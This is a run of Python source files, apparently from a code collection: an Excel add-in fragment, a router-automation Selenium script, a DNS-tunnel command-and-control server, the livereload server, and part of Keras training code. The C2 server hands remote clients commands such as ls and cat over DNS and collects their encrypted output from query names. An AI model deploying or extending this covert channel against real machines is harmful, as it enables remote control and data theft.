    if globalProcess is not None:
        # Only one worker at a time.
        return 'ERROR'
    globalQueue = multiprocessing.Queue()
    globalProcess = multiprocessing.Process(
        target=RunUDFProcessWrapper, args=(args, time.time(), globalQueue))
    globalProcess.start()
    return 'OK'
@xlwings.func
def aicQueueGet(*args):
    """Poll the worker queue for the next ['type', payload] message.

    Returns ['empty', 'empty'] when no worker exists; a 'result' item also
    clears the worker globals so a new run can be started.
    NOTE(review): when the queue exists but currently has no items, control
    falls through and implicitly returns None — inconsistent with the
    ['empty', 'empty'] paths; presumably the VBA side tolerates it, confirm.
    """
    global globalProcess, globalQueue
    if globalProcess is None:
        return ['empty', 'empty']
    if not (globalQueue is None):
        if not globalQueue.empty():
            queueItem = globalQueue.get()
            if queueItem[0] == 'result':
                # Final message: tear down so a new worker can be launched.
                globalProcess = None
                globalQueue = None
            return queueItem
    else:
        return ['empty', 'empty']
@xlwings.func
def aicAbortProcess(*args):
    """Terminate the running worker process (if any) and reset the globals."""
    global globalProcess, globalQueue
    sys.stderr.write("Call from VBA Dialog Runner: aicAbortProcess\n")
    proc = globalProcess
    if proc is not None and proc.is_alive():
        proc.terminate()
    globalProcess = None
    globalQueue = None
print('Loading aicells-config.yml ...')
# The config file lives four directory levels above this package (the add-in
# root). Fixes: build the path with os.path.join instead of hard-coded
# Windows '\\' separators (which broke every other OS), and stop shadowing
# the builtin `dir`.
_module_dir = os.path.dirname(os.path.realpath(__file__))
yamlFile = os.path.join(_module_dir, '..', '..', '..', '..', 'aicells-config.yml')
with open(yamlFile) as fh:
    aicConfig = yaml.load(fh, Loader=yaml.FullLoader)
# Factory used by RunUDF to instantiate function/tool classes by name.
factory = AICFactory.AICFactory(aicConfig)
|
PortDisconnector.py | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import Select
from xvfbwrapper import Xvfb
from selenium.common.exceptions import NoSuchElementException
import threading
# Router admin password (fill in before running).
password = 'Put password here'
# <option> values of the port dropdown to cycle through; '32' (selected again
# on shutdown below) appears to be the default/"connected" state — confirm
# against the router's C_2_2 page.
valueList = ['1048614','38','1048611','35','32']
# NOTE(review): Windows-specific path; PhantomJS is removed in newer Selenium.
phantomjs_path = 'C:/Python27/Scripts/phantomjs.exe'
# Index of the next valueList entry to select.
index = 0
# XPath of the port-selection dropdown on the router status page.
xpath = '//*[@id="pagepost"]/table[1]/tbody/tr[2]/td[2]/select'
#browser = webdriver.Firefox()
browser = webdriver.PhantomJS(phantomjs_path)
browser.set_window_size(1400, 1000)
browser.get('http://192.168.1.254/xslt?PAGE=C_2_2')
def worker():
    """Block on stdin until the user types 'q' (signals the main loop to stop).

    Python 2 script: uses raw_input.
    """
    while raw_input("Type 'q' to quit\n") != 'q':
        pass
    return
# Background thread watching stdin; the browser loop below runs until the
# user types 'q'.
t = threading.Thread(target=worker)
t.start()
# NOTE(review): Thread.isAlive() and raw_input are Python 2 only.
while t.isAlive():
    try:
        # Login form present: submit the admin password.
        element = browser.find_element_by_name('ADM_PASSWORD')
        element.clear()
        element.send_keys(password)
        element.submit()
    except NoSuchElementException:
        # Already logged in: advance the port dropdown to the next value.
        element = browser.find_element_by_xpath(xpath)
        select = Select(element)
        if index > (len(valueList) - 1):
            index = 0  # wrap around
        select.select_by_value(valueList[index])
        index += 1
        element.submit()
# On exit, restore the dropdown to '32', re-authenticating first if the
# session shows the login form again.
try:
    element = browser.find_element_by_name('ADM_PASSWORD')
    element.clear()
    element.send_keys(password)
    element.submit()
    element = browser.find_element_by_xpath(xpath)
    select = Select(element)
    select.select_by_value('32')
    element.submit()
except NoSuchElementException:
    element = browser.find_element_by_xpath(xpath)
    select = Select(element)
    select.select_by_value('32')
    element.submit()
browser.close()
|
server.py | import datetime
import re
import signal
import sys
import threading
import zlib
from arc4 import ARC4
from argparse import ArgumentParser
from typing import Any, Dict
from dnslib import *
from shared import client_to_serv, serv_to_client, get_request_name
class Command:
    """Per-client command state machine.

    Tracks whether the client has been told about the pending command
    (`started`), whether its full reply has arrived (`completed`), and the
    raw qname segments of the streamed reply.
    """

    def __init__(self, addr):
        self.addr = addr
        # True once the reply has fully arrived (or nothing is pending).
        self.completed = True
        # True once the client knows about the command and we await its reply.
        self.started = False
        self.arg = []
        self.segments = []
        self.command = None

    def start(self):
        """Mark the command as announced to the client; reset the reply buffer."""
        self.started = True
        self.completed = False
        self.segments = []

    def add_segment(self, data):
        """Append one raw reply segment (a qname string)."""
        self.segments.append(data)

    def set_command(self, command, arg=None):
        """Queue `command` (with optional `arg`) for the next heartbeat."""
        self.command = command
        self.arg = arg
        self.completed = False
class Server:
    """DNS-tunnel command & control server.

    Listens for DNS queries over UDP and speaks a small covert protocol:
    heartbeats register clients and deliver pending commands (in TXT
    answers); clients stream back compressed, RC4-encrypted, base64url
    output inside query names, reassembled and decrypted here.
    NOTE(review): `socket` and `time` are not imported explicitly — they are
    assumed to arrive via `from dnslib import *` at module top; confirm.
    """

    def __init__(self, args):
        # args is the argparse.Namespace built in the __main__ block.
        self.password = args.password
        self.verbose = args.verbose
        self.listening_port = args.port
        self.listening_ip = args.ip
        # addr -> datetime of the last heartbeat (for inactivity cleanup).
        self.connected_clients = {}
        # addr -> Command state machine for that client.
        self.commands_for_clients: Dict[Any, Command] = {}
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.socket.bind((self.listening_ip, self.listening_port))
        self.socket.settimeout(10)
        self.__log("Started listening on port: {}, ip: {}".format(self.listening_port, self.listening_ip))
        self.running = False

    def __log(self, message):
        """Print a debug line only when --verbose is set."""
        if not self.verbose:
            return
        print("CCS: {}".format(message))

    def run(self):
        """Receive loop: parse each DNS query and dispatch on its qname."""
        if self.running:
            self.__log("Already running...")
            return
        self.running = True
        while self.running:
            try:
                data, addr = self.socket.recvfrom(1024)
                request = DNSRecord.parse(data)
            except Exception:
                # 10s recv timeout or unparsable packet: keep looping.
                self.__log("No valid input...")
                continue
            n = get_request_name(request.get_q().get_qname())
            self.__log("{}: Got request: {}".format(addr, n))
            if request.get_q().get_qname().matchGlob(client_to_serv["HB"]):
                # It is a heartbeat..
                self.__log("{}: Heartbeat".format(addr))
                repl = self.heartbeat_reply(request.reply(), addr)
            elif request.get_q().get_qname().matchSuffix(client_to_serv["RESP"]):
                # It is a reply for our request:
                self.__log("{}: We got a response for our request!".format(addr))
                repl = self.extract_data_from_request(request, addr)
            elif request.get_q().get_qname().matchGlob(client_to_serv["DONE"]):
                # The client has finished sending us data...
                self.__log("{}: Finished request".format(addr))
                repl = self.finished_stream(request, addr)
            else:
                self.__log("{}: ERROR: Got unknown packet, that violates the protocol! Ignoring...".format(addr))
                # NOTE(review): this `return` exits the whole receive loop on
                # one unknown packet; `continue` may have been intended.
                return
            self.socket.sendto(bytes(repl.pack()), addr)

    def finished_stream(self, request, addr):
        """Handle the DONE message: finalize and decrypt the buffered reply."""
        if addr not in self.connected_clients or not self.commands_for_clients[addr].started:
            self.__log("{}: ERROR: Got a protocol-violated message! Sending reset signal...".format(addr))
            command = serv_to_client["RST"]
        else:
            self.__log(
                "{}: Finished receiving stream for command: {}".format(addr, self.commands_for_clients[addr].command))
            command = serv_to_client["ACK"]
            self.commands_for_clients[addr].completed = True
            if not self.decrypt_segments(addr):
                # Decryption failure: drop the buffer and ask for a reset.
                self.__log("Decrypting segments failed. Sending RST error signal")
                command = serv_to_client["RST"]
                self.commands_for_clients[addr].completed = False
                self.commands_for_clients[addr].segments = []
            else:
                print("-- {}: Answered! Refresh to show it.".format(addr))
        repl = request.reply()
        # Status is signalled through the A record's address field.
        repl.add_answer(RR(request.get_q().get_qname(), QTYPE.A, rdata=A(command), ttl=60))
        return repl

    def decrypt_segments(self, addr) -> bool:
        """
        Attempts to decrypt segments

        Strips the RESP suffix and dots, reverses the base64url transport
        encoding, RC4-decrypts with the shared password, and decompresses;
        the decoded text replaces the raw segment list.
        :return: Whether the decryption was successful
        """
        try:
            segments_edited = [(re.sub("{}\.$".format(client_to_serv["RESP"]), "", i).replace(".", ""))
                               for i in self.commands_for_clients[addr].segments]
            flattened = bytes("".join(segments_edited), "utf-8")
            # Undo the DNS-safe base64url substitutions and restore padding.
            flattened_replaced = flattened.replace(b"_", b"/").replace(b"-", b"+")
            replaced_padded = flattened_replaced + b"=" * ((4 - len(flattened_replaced) % 4) % 4)
            decoded = base64.b64decode(replaced_padded)
            deciphered = ARC4(self.password).decrypt(decoded)
            uncompressed = zlib.decompress(deciphered)
            self.commands_for_clients[addr].segments = uncompressed.decode("utf-8")
        except Exception as e:
            print("-- Error while processing data from {}: {}".format(addr, e))
            return False
        return True

    def extract_data_from_request(self, request, addr):
        """Handle a RESP message: buffer one data segment from the client."""
        if addr not in self.connected_clients or not self.commands_for_clients[addr].started:
            self.__log("{}: ERROR: Got a protocol-violated message! Sending reset signal...".format(addr))
            command = serv_to_client["RST"]
        else:
            self.__log("{}: Got data segment for command: {}".format(addr, self.commands_for_clients[addr].command))
            qname = str(request.get_q().get_qname())
            self.commands_for_clients[addr].add_segment(qname)
            command = serv_to_client["ACK"]
        repl = request.reply()
        repl.add_answer(RR(request.get_q().get_qname(), QTYPE.A, rdata=A(command), ttl=60))
        return repl

    def heartbeat_reply(self, request, addr):
        """Build the TXT answer for a heartbeat.

        NOTE(review): the `request` argument is already the reply record
        produced by `request.reply()` in run(), and `.reply()` is called on
        it again below — appears to work with dnslib, but confirm.
        """
        new_one = addr not in self.connected_clients
        self.connected_clients[addr] = datetime.datetime.now()
        args = None
        if new_one:
            # We register a new client
            print("-- New client {} registered!".format(addr))
            self.commands_for_clients[addr] = Command(addr)
            command = "ACK"
        elif self.commands_for_clients[addr].completed:
            # We do not have any commands for this machine
            command = "NOP"
        else:
            # We have job for you!
            if self.commands_for_clients[addr].started:
                self.__log(
                    "{}: ERROR: The client has sent us a Heartbeat, while it was supposed to send a reply!".format(
                        addr))
                self.commands_for_clients[addr].started = False
                command = "RST"
            else:
                self.commands_for_clients[addr].start()
                command = self.commands_for_clients[addr].command
                args = self.commands_for_clients[addr].arg
        # Sanity check
        if command is None:
            self.__log("{}: Cannot reply with None message!".format(addr))
            return
        reply = request.reply()
        self.__log("{}: Sending {} command...".format(addr, command))
        reply.add_answer(RR(client_to_serv["HB"], QTYPE.TXT, rdata=TXT(serv_to_client[command]), ttl=60))
        if args is not None:
            # Command argument rides in a second TXT record.
            reply.add_answer(RR(client_to_serv["HB"], QTYPE.TXT, rdata=TXT(args), ttl=60))
        return reply

    def cleanup_connected(self):
        """
        Removes all inactive clients from the client list
        """
        addresses = list(self.connected_clients.keys())
        for i in addresses:
            # TODO: Change back to 200
            if abs((datetime.datetime.now() - self.connected_clients[i]).total_seconds()) > 20:
                print("Cleaning up client {} because of inactivity".format(i))
                del self.connected_clients[i]
                del self.commands_for_clients[i]

    def next_command(self):
        """
        Instruction for the Server object to get and answer a new command from the user.
        """
        # First print any finished replies (segments are a decoded str once
        # decrypt_segments succeeded) and clear their 'started' flag.
        for addr in self.commands_for_clients:
            if self.commands_for_clients[addr].completed and self.commands_for_clients[addr].started and type(
                    self.commands_for_clients[addr].segments) == str:
                print("\n~~~~~~~~~~~~~~~~\nReply from {} for request: {}:".format(addr, self.commands_for_clients[
                    addr].command))
                print(self.commands_for_clients[addr].segments)
                print("~~~~~~~~~~~~~~~~")
                self.commands_for_clients[addr].started = False
        try:
            if len(self.connected_clients) == 0:
                print("No clients connected.")
                time.sleep(5)
                return
            self.cleanup_connected()
            print("\n================")
            # Select IP to give commands to:
            print("0: Refresh")
            addresses = list(self.connected_clients.keys())
            for i in range(len(addresses)):
                print("{}: {} {}".format(i + 1, addresses[i],
                                         "" if self.commands_for_clients[addresses[i]].completed else "- BUSY"))
            selected_ip = int(input("Select your target: \n================\n"))
            if selected_ip == 0:
                return
            else:
                # Compensate for the rescan option
                selected_ip -= 1
            tar_addr = list(self.connected_clients.keys())[selected_ip]
            if not self.commands_for_clients[tar_addr].completed:
                print("You have selected a busy client! Try again when it finishes its task.")
                return
            print("\n================")
            # Select command:
            print("1: ls")
            print("2: w")
            print("3: ps")
            print("4: cat")
            print("5: nop")
            print("6: client-exit")
            print("7: exit")
            command = int(input("Command number: \n================\n"))
            argument = None
            if command == 1:
                command = "LS"
                argument = input("Enter argument: ")
            elif command == 2:
                command = "W"
            elif command == 3:
                command = "PS"
            elif command == 4:
                command = "CAT"
                argument = input("Enter argument: ")
            elif command == 5:
                return
            elif command == 6:
                command = "SD"
            elif command == 7:
                # Stops the receive loop; the main thread then joins it.
                self.running = False
                return
            self.commands_for_clients[tar_addr].set_command(command, argument)
        except Exception as e:
            # Bad numeric input, out-of-range selection, etc.
            print("Invalid input! {}".format(e), file=sys.stderr)
class Worker:
    """Runs a Server's receive loop on a background daemon thread."""

    def __init__(self, server: Server):
        self.server = server
        self.thread = threading.Thread(target=server.run, args=())
        # Daemon thread: does not keep the process alive on exit.
        self.thread.daemon = True

    def start(self):
        """Launch the server loop in the background."""
        self.thread.start()

    def stop(self):
        """Ask the server loop to exit, then wait for the thread to finish."""
        print("Stopping daemon...")
        self.server.running = False
        self.thread.join()
def signal_handler(sig, frame, worker):
    """SIGINT handler: shut the worker down cleanly, then exit with status 0.

    `sig` and `frame` match the signal-handler signature (unused); `worker`
    is the Worker whose thread is joined before the process exits.
    """
    print('You pressed Ctrl+C!')
    worker.stop()
    raise SystemExit(0)
if __name__ == '__main__':
    parser = ArgumentParser()
    parser.add_argument("-pass", "--password", help="The password used to encrypt the communication", type=str,
                        default="heslo")
    # NOTE(review): argparse type=bool treats any non-empty string as True
    # ("-v False" enables verbose); action='store_true' is the usual fix.
    parser.add_argument("-v", "--verbose", help="Show detailed debug info", type=bool, default=False)
    parser.add_argument("-ip", "--ip", help="Server IP", type=str, default="127.0.0.1")
    parser.add_argument("-p", "--port", help="Port of this server", type=int, default=51271)
    args = parser.parse_args()
    server = Server(args)
    worker = Worker(server)
    # Route Ctrl+C through signal_handler so the daemon thread gets joined.
    signal.signal(signal.SIGINT, lambda sig, frame: signal_handler(sig, frame, worker))
    worker.start()
    # Interactive prompt loop on the main thread until 'exit' is chosen.
    # NOTE(review): server.running is set True inside run() on the worker
    # thread; if the loop condition is checked first, it may exit at once.
    while server.running:
        server.next_command()
        time.sleep(1)
    worker.stop()
|
server.py | """
livereload.server
~~~~~~~~~~~~~~~~~
WSGI app server for livereload.
:copyright: (c) 2013 - 2015 by Hsiaoming Yang
:license: BSD, see LICENSE for more details.
"""
import os
import time
import shlex
import logging
import threading
import webbrowser
from subprocess import Popen, PIPE
from tornado.wsgi import WSGIContainer
from tornado.ioloop import IOLoop
from tornado.autoreload import add_reload_hook
from tornado import web
from tornado import escape
from tornado import httputil
from tornado.log import LogFormatter
from .handlers import LiveReloadHandler, LiveReloadJSHandler
from .handlers import ForceReloadHandler, StaticFileHandler
from .watcher import get_watcher_class
import sys
# errno compatibility: on Python >= 3.7 it is imported as a top-level module;
# older interpreters exposed it via the os module.
if sys.version_info >= (3, 7):
    import errno
else:
    from os import errno
# Python 3.8 made the Proactor event loop the Windows default, which lacks
# APIs Tornado requires; force the selector-based loop instead.
if sys.version_info >= (3, 8) and sys.platform == 'win32':
    import asyncio
    asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
logger = logging.getLogger('livereload')
# Marker before which the livereload <script> tag is injected into HTML.
HEAD_END = b'</head>'
def set_header(fn, name, value):
    """Helper: wrap a set_default_headers method so it also sets name: value.

    Returns a replacement for RequestHandler.set_default_headers that first
    calls the wrapped original `fn` and then adds the extra header via
    self.set_header.
    """
    def set_default_headers(self, *args, **kwargs):
        fn(self, *args, **kwargs)  # preserve whatever the original set
        self.set_header(name, value)
    return set_default_headers
def shell(cmd, output=None, mode='w', cwd=None, shell=False):
    """Execute a shell command.

    You can add a shell command::

        server.watch(
            'style.less', shell('lessc style.less', output='style.css')
        )

    :param cmd: a shell command, string or list
    :param output: output stdout to the given file
    :param mode: only works with output, mode ``w`` means write,
                 mode ``a`` means append
    :param cwd: set working directory before command is executed.
    :param shell: if true, on Unix the executable argument specifies a
                  replacement shell for the default ``/bin/sh``.
    :returns: a zero-argument callable that runs the command. The callable
              returns the ``OSError`` when the command cannot be launched,
              the stderr bytes when the command reported errors, and
              ``None`` on success (stdout is written to *output*).
    """
    if not output:
        output = os.devnull  # discard stdout unless a file was requested
    else:
        folder = os.path.dirname(output)
        if folder and not os.path.isdir(folder):
            os.makedirs(folder)
    # String commands are tokenized unless a real shell will interpret them.
    if not isinstance(cmd, (list, tuple)) and not shell:
        cmd = shlex.split(cmd)

    def run_shell():
        try:
            p = Popen(cmd, stdin=PIPE, stdout=PIPE, stderr=PIPE, cwd=cwd,
                      shell=shell)
        except OSError as e:
            logger.error(e)
            if e.errno == errno.ENOENT:  # file (command) not found
                logger.error("maybe you haven't installed %s", cmd[0])
            return e
        stdout, stderr = p.communicate()
        if stderr:
            logger.error(stderr)
            return stderr
        #: stdout is bytes, decode for python3
        stdout = stdout.decode()
        with open(output, mode) as f:
            f.write(stdout)
    return run_shell
class LiveScriptInjector(web.OutputTransform):
    """Tornado output transform that injects the livereload script tag.

    NOTE(review): ``self.script`` is never assigned in this class; it appears
    to be set externally (e.g. as a class attribute) before requests are
    served — confirm before relying on it.
    """

    def __init__(self, request):
        super().__init__(request)

    def transform_first_chunk(self, status_code, headers, chunk, finishing):
        # Splice the script right before </head> and keep Content-Length
        # consistent with the enlarged body.
        if HEAD_END in chunk:
            chunk = chunk.replace(HEAD_END, self.script + HEAD_END)
            if 'Content-Length' in headers:
                length = int(headers['Content-Length']) + len(self.script)
                headers['Content-Length'] = str(length)
        return status_code, headers, chunk
class LiveScriptContainer(WSGIContainer):
    """WSGI-to-Tornado bridge that injects the livereload script into HTML.

    Behaves like tornado.wsgi.WSGIContainer, but rewrites the response body:
    when ``</head>`` is present, the configured script tag is spliced in and
    Content-Length is recomputed.
    NOTE(review): __init__ does not call WSGIContainer.__init__; this relies
    on the base class needing no extra state for the methods used here —
    confirm against the Tornado version in use.
    """

    def __init__(self, wsgi_app, script=''):
        self.wsgi_app = wsgi_app
        # The <script> tag injected before HEAD_END. NOTE(review): the body is
        # bytes after escape.utf8, so this is presumably set to bytes by the
        # caller (the default '' str would fail on injection) — confirm.
        self.script = script

    def __call__(self, request):
        data = {}  # filled by start_response with the status line and headers
        response = []

        def start_response(status, response_headers, exc_info=None):
            data["status"] = status
            data["headers"] = response_headers
            return response.append
        app_response = self.wsgi_app(
            WSGIContainer.environ(request), start_response)
        try:
            response.extend(app_response)
            body = b"".join(response)
        finally:
            # PEP 3333: close() must be called on the app iterable if present.
            if hasattr(app_response, "close"):
                app_response.close()
        if not data:
            raise Exception("WSGI app did not call start_response")
        status_code, reason = data["status"].split(' ', 1)
        status_code = int(status_code)
        headers = data["headers"]
        header_set = {k.lower() for (k, v) in headers}
        body = escape.utf8(body)
        if HEAD_END in body:
            # Inject the livereload script right before </head>.
            body = body.replace(HEAD_END, self.script + HEAD_END)
        if status_code != 304:
            # 304 responses must not carry entity headers.
            if "content-type" not in header_set:
                headers.append((
                    "Content-Type",
                    "application/octet-stream; charset=UTF-8"
                ))
            if "content-length" not in header_set:
                headers.append(("Content-Length", str(len(body))))
            if "server" not in header_set:
                headers.append(("Server", "LiveServer"))
        start_line = httputil.ResponseStartLine(
            "HTTP/1.1", status_code, reason
        )
        header_obj = httputil.HTTPHeaders()
        for key, value in headers:
            if key.lower() == 'content-length':
                # The body may have grown after injection; fix the length.
                value = str(len(body))
            header_obj.add(key, value)
        request.connection.write_headers(start_line, header_obj, chunk=body)
        request.connection.finish()
        self._log(status_code, request)
class Server:
    """Livereload server interface.

    Initialize a server and watch file changes::

        server = Server(wsgi_app)
        server.serve()

    :param app: a wsgi application instance
    :param watcher: A Watcher instance, you don't have to initialize
                    it by yourself. Under Linux, you will want to install
                    pyinotify and use INotifyWatcher() to avoid wasted
                    CPU usage.
    """

    def __init__(self, app=None, watcher=None):
        # root: static-file root directory; set later via serve(root=...)
        self.root = None
        self.app = app
        if not watcher:
            # pick the best available watcher implementation for this platform
            watcher_cls = get_watcher_class()
            watcher = watcher_cls()
        self.watcher = watcher
        # SFH: the static-file handler class used for non-app serving
        self.SFH = StaticFileHandler

    def setHeader(self, name, value):
        """Add or override an HTTP header sent with every response.

        Once you have initialized a server, you can add one or more
        headers before starting the server::

            server.setHeader('Access-Control-Allow-Origin', '*')
            server.setHeader('Access-Control-Allow-Methods', '*')
            server.serve()

        :param name: The name of the header field to be defined.
        :param value: The value of the header field to be defined.

        NOTE: this monkey-patches ``StaticFileHandler.set_default_headers``
        at class level, so it affects every instance process-wide.
        """
        StaticFileHandler.set_default_headers = set_header(
            StaticFileHandler.set_default_headers, name, value)
        self.SFH = StaticFileHandler

    def watch(self, filepath, func=None, delay=None, ignore=None):
        """Add the given filepath to the watcher list.

        Once you have initialized a server, watch file changes before
        serving the server::

            server.watch('static/*.stylus', 'make static')
            def alert():
                print('foo')
            server.watch('foo.txt', alert)
            server.serve()

        :param filepath: files to be watched, it can be a filepath,
                         a directory, or a glob pattern
        :param func: the function to be called, it can be a string of
                     shell command, or any callable object without
                     parameters
        :param delay: Delay sending the reload message. Use 'forever' to
                      not send it. This is useful to compile sass files to
                      css, but reload on changed css files then only.
        :param ignore: A function return True to ignore a certain pattern of
                       filepath.
        """
        if isinstance(func, str):
            # a string is treated as a shell command; wrap it in a callable
            cmd = func
            func = shell(func)
            func.name = f"shell: {cmd}"
        self.watcher.watch(filepath, func, delay, ignore=ignore)

    def application(self, port, host, liveport=None, debug=None,
                    live_css=True):
        """Build and bind the Tornado application(s).

        When ``liveport`` is given, the livereload endpoints are served by
        a second application on that port; otherwise both the content and
        the livereload endpoints share ``port``.
        """
        LiveReloadHandler.watcher = self.watcher
        LiveReloadHandler.live_css = live_css
        # default to Tornado debug/autoreload mode when wrapping a WSGI app
        if debug is None and self.app:
            debug = True

        live_handlers = [
            (r'/livereload', LiveReloadHandler),
            (r'/forcereload', ForceReloadHandler),
            (r'/livereload.js', LiveReloadJSHandler)
        ]

        # The livereload.js snippet.
        # Uses JavaScript to dynamically inject the client's hostname.
        # This allows for serving on 0.0.0.0.
        live_script = (
            '<script type="text/javascript">(function(){'
            'var s=document.createElement("script");'
            'var port=%s;'
            's.src="//"+window.location.hostname+":"+port'
            '+ "/livereload.js?port=" + port;'
            'document.head.appendChild(s);'
            '})();</script>'
        )
        # %s is replaced either by the explicit live port, or by a JS
        # expression that reuses the page's own port at runtime
        if liveport:
            live_script = escape.utf8(live_script % liveport)
        else:
            live_script = escape.utf8(live_script % "(window.location.port || (window.location.protocol == 'https:' ? 443: 80))")

        web_handlers = self.get_web_handlers(live_script)

        # bind the snippet into a transform subclass via a class attribute
        class ConfiguredTransform(LiveScriptInjector):
            script = live_script

        if not liveport:
            # single application serves both content and livereload endpoints
            handlers = live_handlers + web_handlers
            app = web.Application(
                handlers=handlers,
                debug=debug,
                transforms=[ConfiguredTransform]
            )
            app.listen(port, address=host)
        else:
            # content on `port`, livereload endpoints on `liveport`
            app = web.Application(
                handlers=web_handlers,
                debug=debug,
                transforms=[ConfiguredTransform]
            )
            app.listen(port, address=host)
            live = web.Application(handlers=live_handlers, debug=False)
            live.listen(liveport, address=host)

    def get_web_handlers(self, script):
        """Return the content handlers: WSGI fallback or static files."""
        if self.app:
            fallback = LiveScriptContainer(self.app, script)
            return [(r'.*', web.FallbackHandler, {'fallback': fallback})]
        return [
            (r'/(.*)', self.SFH, {
                'path': self.root or '.',
                'default_filename': self.default_filename,
            }),
        ]

    def serve(self, port=5500, liveport=None, host=None, root=None, debug=None,
              open_url=False, restart_delay=2, open_url_delay=None,
              live_css=True, default_filename='index.html'):
        """Start serving the server on the given port (blocks until Ctrl-C).

        :param port: serve on this port, default is 5500
        :param liveport: live reload on this port
        :param host: serve on this hostname, default is 127.0.0.1
        :param root: serve static on this root directory
        :param debug: set debug mode, which autoreloads the app on code changes
                      via Tornado (and causes polling). Defaults to True when
                      ``self.app`` is set, otherwise False.
        :param open_url: deprecated; use ``open_url_delay`` instead
        :param restart_delay: delay (seconds) queued for the initial
                              ``__livereload__`` change event
        :param open_url_delay: open webbrowser after the delay seconds
        :param live_css: whether to use live css or force reload on css.
                         Defaults to True
        :param default_filename: launch this file from the selected root on startup
        """
        host = host or '127.0.0.1'
        if root is not None:
            self.root = root
        self._setup_logging()
        logger.info(f'Serving on http://{host}:{port}')
        self.default_filename = default_filename

        self.application(
            port, host, liveport=liveport, debug=debug, live_css=live_css)

        # Async open web browser after `open_url_delay` seconds
        if open_url:
            logger.error('Use `open_url_delay` instead of `open_url`')
        if open_url_delay is not None:
            def opener():
                time.sleep(open_url_delay)
                webbrowser.open(f'http://{host}:{port}')
            threading.Thread(target=opener).start()

        try:
            # queue a synthetic change so clients reload once on startup;
            # NOTE(review): reaches into the watcher's private _changes list
            self.watcher._changes.append(('__livereload__', restart_delay))
            LiveReloadHandler.start_tasks()
            add_reload_hook(lambda: IOLoop.instance().close(all_fds=True))
            IOLoop.instance().start()
        except KeyboardInterrupt:
            logger.info('Shutting down...')

    def _setup_logging(self):
        """Attach a stream handler to our logger and to Tornado's."""
        logger.setLevel(logging.INFO)
        channel = logging.StreamHandler()
        channel.setFormatter(LogFormatter())
        logger.addHandler(channel)
        # need a tornado logging handler to prevent IOLoop._setup_logging
        logging.getLogger('tornado').addHandler(channel)
|
training.py | from __future__ import print_function
from __future__ import absolute_import
import warnings
import copy
import time
import numpy as np
import multiprocessing
import threading
import six
try:
import queue
except ImportError:
import Queue as queue
from .topology import Container
from .. import backend as K
from .. import optimizers
from .. import objectives
from .. import metrics as metrics_module
from ..utils.generic_utils import Progbar
from .. import callbacks as cbks
def standardize_input_data(data, names, shapes=None,
                           check_batch_dim=True,
                           exception_prefix=''):
    '''Normalize user-provided data to an ordered list of Numpy arrays.

    `data` may arrive as a dict keyed by input name, a list (ordered like
    `names`), or a single array. The result is always a list aligned with
    `names`; 1D arrays are promoted to 2D, and shapes are validated
    against `shapes` when given.
    '''
    # --- normalize `data` into `arrays`, one entry per name ---
    if type(data) is dict:
        arrays = []
        for name in names:
            if name not in data:
                raise Exception('No data provided for "' +
                                name + '". Need data for each key in: ' +
                                str(data.keys()))
            arrays.append(data[name])
    elif type(data) is list:
        if len(data) != len(names):
            if len(data) > 0 and hasattr(data[0], 'shape'):
                raise Exception('Error when checking ' + exception_prefix +
                                ': the list of Numpy arrays '
                                'that you are passing to your model '
                                'is not the size the model expected. '
                                'Expected to see ' + str(len(names)) +
                                ' arrays but instead got '
                                'the following list of ' + str(len(data)) +
                                ' arrays: ' + str(data)[:200] +
                                '...')
            elif len(names) == 1:
                # a flat list of scalars for a single input: wrap it
                data = [np.asarray(data)]
            else:
                raise Exception('Error when checking ' + exception_prefix +
                                ': you are passing a list as '
                                'input to your model, '
                                'but the model expects '
                                'a list of ' + str(len(names)) +
                                ' Numpy arrays instead. '
                                'The list you passed was: ' +
                                str(data)[:200])
        arrays = data
    else:
        if not hasattr(data, 'shape'):
            raise Exception('Error when checking ' + exception_prefix +
                            ': data should be a Numpy array, '
                            'or list/dict of Numpy arrays. '
                            'Found: ' + str(data)[:200] + '...')
        if len(names) != 1:
            # case: model expects multiple inputs but only received
            # a single Numpy array
            raise Exception('The model expects ' + str(len(names)) +
                            ' input arrays, but only received one array. '
                            'Found: array with shape ' + str(data.shape))
        arrays = [data]

    # --- promote 1D arrays to 2D by adding a trailing axis ---
    for i, array in enumerate(arrays):
        if len(array.shape) == 1:
            arrays[i] = np.expand_dims(array, 1)

    # --- validate against the expected shapes, if provided ---
    if shapes:
        for i in range(len(names)):
            if shapes[i] is None:
                continue
            array = arrays[i]
            if len(array.shape) != len(shapes[i]):
                raise Exception('Error when checking ' + exception_prefix +
                                ': expected ' + names[i] +
                                ' to have ' + str(len(shapes[i])) +
                                ' dimensions, but got array with shape ' +
                                str(array.shape))
            for j, (dim, ref_dim) in enumerate(zip(array.shape, shapes[i])):
                if not j and not check_batch_dim:
                    # skip the first (batch) axis
                    continue
                if ref_dim and ref_dim != dim:
                    raise Exception('Error when checking ' + exception_prefix +
                                    ': expected ' + names[i] +
                                    ' to have shape ' + str(shapes[i]) +
                                    ' but got array with shape ' +
                                    str(array.shape))
    return arrays
def standardize_sample_or_class_weights(x_weight, output_names, weight_type):
    """Normalize `sample_weight`/`class_weight` user input to a per-output list.

    # Arguments
        x_weight: None, a single weight spec, a list with one entry per
            output, or a dict keyed by output name.
        output_names: list of the model's output names.
        weight_type: 'sample_weight' or 'class_weight'; used in messages.

    # Returns
        A list with one entry (possibly None) per output in `output_names`.

    # Raises
        Exception: if a list has the wrong length, or the type cannot be
            interpreted for a multi-output model.
    """
    if x_weight is None or len(x_weight) == 0:
        return [None for _ in output_names]
    if len(output_names) == 1:
        if type(x_weight) is list and len(x_weight) == 1:
            return x_weight
        if type(x_weight) is dict and output_names[0] in x_weight:
            return [x_weight[output_names[0]]]
        else:
            # single output: any other spec is taken as the weight itself
            return [x_weight]
    if type(x_weight) is list:
        if len(x_weight) != len(output_names):
            # (fixed: the message previously ran "`...`array" together)
            raise Exception('Provided `' + weight_type + '` was a list of ' +
                            str(len(x_weight)) +
                            ' elements, but the model has ' +
                            str(len(output_names)) + ' outputs. '
                            'You should provide one `' + weight_type + '` '
                            'array per model output.')
        return x_weight
    if type(x_weight) is dict:
        x_weights = []
        for name in output_names:
            # missing names get None (no weighting for that output)
            x_weights.append(x_weight.get(name))
        return x_weights
    else:
        # (fixed: message previously read "a list of a dict")
        raise Exception('The model has multiple outputs, so `' +
                        weight_type + '` '
                        'should be either a list or a dict. '
                        'Provided `' + weight_type +
                        '` type not understood: ' +
